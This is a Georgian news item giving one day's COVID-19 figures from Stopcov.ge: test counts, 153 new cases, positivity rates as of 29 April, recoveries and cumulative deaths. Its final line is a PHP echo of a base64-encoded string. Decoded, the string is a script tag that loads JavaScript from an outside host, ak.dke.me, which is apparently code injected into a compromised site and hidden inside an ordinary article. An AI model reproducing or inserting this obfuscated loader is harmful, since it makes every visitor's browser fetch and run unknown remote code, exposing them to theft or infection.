celsiusi
ავერსი შნაიდერი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციის თანახმად, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 22 312 კვლევა ტესტით, მათ შორის 20 223 კვლევა ანტიგენის ტესტით და 2 089 PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში გამოვლინდა ვირუსით ინფიცირების 153 ახალი დადასტურებული შემთხვევა. ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობა შეადგენს  1 655 098-ს.
 
რაც შეეხება დადებითობის მაჩვენებელს, 29 აპრილის მდგომარეობით, დადებითობის დღიური მაჩვენებელი არის 0.69%, ბოლო 14 დღის მანძილზე - 1.01% ხოლო 7 დღის მანძილზე - 0.87%.
ბოლო 24 საათში ვირუსისგან გამოჯანმრთელდა 237 პირი, ხოლო ჯამში გამოჯანმრთელებულთა რაოდენობა გაიზარდა 1 637 037-მდე.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 0 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 16 807 პირი ემსხვერპლა.
 
692
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");